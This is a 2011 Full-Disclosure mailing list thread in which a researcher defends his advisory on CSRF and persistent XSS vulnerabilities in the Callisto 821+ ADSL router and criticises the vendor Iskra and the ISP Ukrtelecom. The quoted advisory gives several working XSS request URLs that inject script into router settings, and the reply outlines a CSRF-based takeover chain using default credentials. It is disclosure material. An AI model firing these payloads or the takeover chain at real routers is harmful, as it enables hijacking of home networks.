Hello 0xd0!

> So, you could maybe have to think if the router has port 80 open and i assume 
> a remote-service

Yes, port 80 (and also 8008, as I wrote in my first advisory about Callisto 
821+) is open, but it's accessible only from local - from local computer and 
LAN, and not from Internet (by default it's disabled). And all those hundreds 
of CSRF, XSS and DoS holes which I disclosed, without taking into account 
"unlimited" XSS and DoS holes, allow to bypass this limitation of disallowed 
remote access and to attack control panel from remote. Including it's possible 
to enable via CSRF a remote access from Internet to control panel and then by 
using default login and password (or if worry that user changed it, then make 
via CSRF a new user with specified login and password) log into control panel 
and take router under control.

About such "unlimited" vulnerabilities I wrote in article How to find billion 
of XSS vulnerabilities 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-November/007233.html).

> Luckily some isp's do protect your modem, as many are so it seems, coded 
> weakly in the firmware area.


Developer of modem already protected (as they thought) their consumers by 
disallowing access from Internet by default. My ISP Ukrtelecom (already my ex 
ISP) didn't change this setting and also thought it was enough to protect 
clients. After in beginning of April I first time entered into control panel 
and found that it was full of CSRF holes (in addition to default login and 
password), I talked with Ukrtelecom's representative by phone.

And asked him why their company didn't change default login and password and 
not inform all their clients about control panel, the login and password for 
specific model of router (different models have differences and no 
documentation on routers was given to the clients), the fact that default login 
and password was used and not recommended clients to change it. And they 
answered that because by default access from Internet is disallowed, they 
though that everything is secure and their company (holemaking one - with 
multiple holes on multiple their web sites and in their Internet and 
telecommunication services, which I've informed them for last years) don't 
worry about their clients. And on my question about multiple CSRF which can 
remotely change any settings of modem, he didn't answer, because he don't know 
what it is. So attacks from local (from lamers or viruses at local computer or 
LAN) and attacks from Internet on logged in to control panel modem owner are 
possible and not considered as a threat at all by developer of the router and 
this ISP (similar situation can be with other ISPs).

> That is consumer value,and i assume the company has released a patch ?

No, company (Iskra) completely ignored these issues (and there are hundreds of 
holes in their router). They ignored as my first letter from 26th of May, as 
all other letters (24 letters in total during May - July about different 
vulnerabilities). Looks like they don't care about security of their products 
and of their clients. Similarly as ISP Ukrtelecom, which is Iskra's routers 
distributor in Ukraine (possibly only one ISP who distribute these routers) and 
which is also completely ignored security of their own sites, services, routers 
which they sell and of their clients.

So all consumers of Isrka modems should know the truth - the real situation 
with security of the routers of this company. I made my decision (after all 
these holes in Ukrtelecom and Iskra and their ignoring) - I no more using not 
their services, nor their modems. Besides, Iskra is funny company - from their 
official e-mails (mentioned at the site) service@ is not working at all, but 
e-marketing@ works, but they're not answering, not fixing, just ignoring, as 
I've already mentioned.

> why then disclose the thing, i guess you either go one way or the other, know 
> what i mean ?

No I don't :-). But there are always reasons for disclosing vulnerabilities. 
And there are reasons in this particular case and they are obvious and 
mentioned in every my post about this router (besides worrying about security 
of the people which is by default in all my disclosures).

> but yea, nice stuff if xss is your thing. ;')

All these hundreds of CSRF, XSS and DoS holes in this router are nice by its 
own. And yes, there are all found by me. All these holes in Callisto 821+ 
(http://securityvulns.ru/news/ZTE/Callisto/821.html) (from 24 advisories 3APA3A 
forget to put two in July, so they are no listed in this list - I've already 
reminded him two times, so he'd fix it).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
  ----- Original Message ----- 
  From: -= Glowing Sex =- 
  To: MustLive 
  Cc: full-disclosure@lists.grok.org.uk 
  Sent: Saturday, July 30, 2011 1:42 AM
  Subject: Re: [Full-disclosure] Multiple CSRF and XSS vulnerabilities in ADSL 
modem Callisto 821+


  So... advanced...
  So, you could maybe have to think if the router has port 80 open and i assume 
a remote-service,most isp's would have the port 80 remote-assist open for 
possibly helping a customer,I know that is the first thing i switch to 'off' 
,and actually, my isp went thru that with me on install.
  Luckily some isp's do protect your modem, as many are so it seems, coded 
weakly in the firmware area.

  That is consumer value,and i assume the company has released a patch ? 
Usually, you would either contact a vendor and completely see-it-through,asin 
wait for theyre reply, I do not see this in the actual timeline, i only see 
that you have said your working 'with' them, and theyre CEO... why then 
disclose the thing, i guess you either go one way or the other, know what i 
mean ?
  You should have a 2011-*-* - Vendor has now patched the issue regarding this 
, and possibly if it is serious, assigned a bid/cve.
  I am only assuming what i see with other disclosure policies... but yea, nice 
stuff if xss is your thing. ;')
  cheers
  0xd0




  On 30 July 2011 07:30, MustLive <mustl...@websecurity.com.ua> wrote:

    Hello list!

    After discussion with Michael Simpson about these vulnerabilities in
    Callisto 821+, I want to warn you about new multiple security
    vulnerabilities in ADSL modem Callisto 821+ (SI2000 Callisto821+ Router).

    These are Cross-Site Request Forgery and Cross-Site Scripting
    vulnerabilities. In April I've already drew attention of Ukrtelecom's
    representative (and this modem was bough at Ukrtelecom) about multiple
    vulnerabilities in this model of Callisto modems (and other models also
    could be affected).

    SecurityVulns ID: 11700.

    -------------------------
    Affected products:
    -------------------------

    Vulnerable is the next model: SI2000 Callisto821+ Router: X7821 Annex A
    v1.0.0.0 / Argon 4x1 CSP v1.0 (ISOS 9.0) [4.3.4-5.1]. This model with other
    firmware and also other models of Callisto also must be vulnerable.

    ----------
    Details:
    ----------

    These attacks should be conducted on modem owner, which is logged into
    control panel. Taking into account that it's unlikely to catch him in this
    state, then it's possible to use before-mentioned vulnerabilities
    (http://websecurity.com.ua/5161/) for conducting of remote login (for
    logining him into control panel). After that it's possible to conduct CSRF
    or XSS attack.

    CSRF (WASC-09):

    Every connection in section LAN connections, as default, as other
    connections, has advanced settings. Let's view on example of default
    connection (iplan).

    In section Edit connection in subsection Edit Ip Interface
    
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan)
    via CSRF it's possible to change settings (IP, Mask and others) of
    connection.

    In subsection Edit Tcp Mss Clamp
    
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImTcpMssClamp)
    via CSRF it's possible to change settings of connection.

    In subsection Edit Rip Versions
    
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImRipVersions)
    via CSRF it's possible to change settings of connection.

    In subsection Edit NAT
    
(http://192.168.1.1/configuration/edit-form.html?ImRouter.ImIpInterfaces.iplan.ImNatHelper)
    via CSRF it's possible to change settings of connection.

    XSS (WASC-08):

    There are many persistent XSS vulnerabilities in above-mentioned four
    subsections of section Edit connection.

    In subsection Edit Ip Interface:

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aipaddr=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amask=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Adhcp=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Amtu=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AsourceAddrValidation=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3AicmpRouterAdvertise=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    
http://192.168.1.1/configuration/edit-form.html/edit?EmWeb_ns%3Avim%3A3=%2Fconfiguration%2Fedit-form.html&EmWeb_ns%3Avim%3A2.ImRouter.ImIpInterfaces.iplan%3Aenabled=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    In subsections Edit Tcp Mss Clamp, Edit Rip Versions and Edit NAT the
    situation is similar.

    And also attacks via the names of parameters are possible (when XSS code is
    setting in the name of parameter), which I wrote about earlier
    (http://websecurity.com.ua/5277/).

    In this case the code will be executed immediately, and also at visiting of
    pages http://192.168.1.1/system/events.html and
    http://192.168.1.1/shared/event_log_selection.html.

    ------------
    Timeline:
    ------------

    2011.04.14 - informed Ukrtelecom about multiple vulnerabilities in modems,
    which they give (sell) to their clients.
    2011.07.23 - disclosed at my site.
    2011.07.24 - informed developers (Iskratel).

    I mentioned about these vulnerabilities at my site
    (http://websecurity.com.ua/5296/).

    Best wishes & regards,
    MustLive
    Administrator of Websecurity web site
    http://websecurity.com.ua


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to